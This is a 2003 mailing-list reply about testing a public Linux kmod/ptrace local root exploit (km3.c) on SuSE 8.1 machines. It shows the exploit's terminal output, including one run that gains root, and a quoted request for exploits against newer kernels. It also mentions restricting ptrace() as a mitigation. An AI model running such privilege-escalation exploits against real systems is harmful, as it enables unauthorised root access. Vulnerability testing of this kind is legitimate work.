Hi again!

Hmm, on one SuSE 8.1 machine it didn't work before, and now, after "testing" another modified version of the km3.c, km3 itself also works:

david@imladris:~> ./km3
Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>
=> Simple mode, executing /usr/bin/id > /dev/tty
sizeof(shellcode)=95
=> Child process started..........
=> Child process started.....+ 9432 - 9432 ok!
david@imladris:~> uid=0(root) gid=0(root) groups=100(users),6(disk),500(mldonkey)

On another SuSE 8.1 machine, running km3 the first (and second) time produces this output:

david@minasmorgul:~> ./km3
Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>
=> Simple mode, executing /usr/bin/id > /dev/tty
sizeof(shellcode)=95
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..........
=> Child process started..

david@minasmorgul:~> ./km3
Linux kmod + ptrace local root exploit by <anszom@v-lo.krakow.pl>
=> Simple mode, executing /usr/bin/id > /dev/tty
sizeof(shellcode)=95
=> Child process started..........
=> Child process started..........
=> Child process started....

Both times I interrupted the program after a while via Ctrl-C. On both machines km3 is not suid and k_deflt-2.4.19-174 is installed.

On Wednesday, 26 March 2003 22:21, Eduard Avetisyan wrote:
> Hi ;-)
>
> --- David Huecking <d.huecking@gmx.net> wrote:
>
> > For me it only works for SuSE Kernel 2.4.16-4GB delivered for SuSE 7.3. 2.4.18-4GB of 8.0 and 2.4.19-4GB of 8.1 seem to be "safe" against THIS particular exploit. (All the "old" unpatched versions...) Does anybody have an exploit for these kernels?
>
> I've seen it (the km3.c) work on at least two machines with 8.1, probably the k_deflt kernel...
But when changing the syscall ptrace() to a version that only works for euid 0, none of the exploits above work... ;-)

--
Eat, sleep and go running, David Huecking.
Encrypted eMail welcome! GnuPG/PGP-Key: 0x57809216.
Fingerprint: 3DF2 CBE0 DFAA 4164 02C2 4E2A E005 8DF7 5780 9216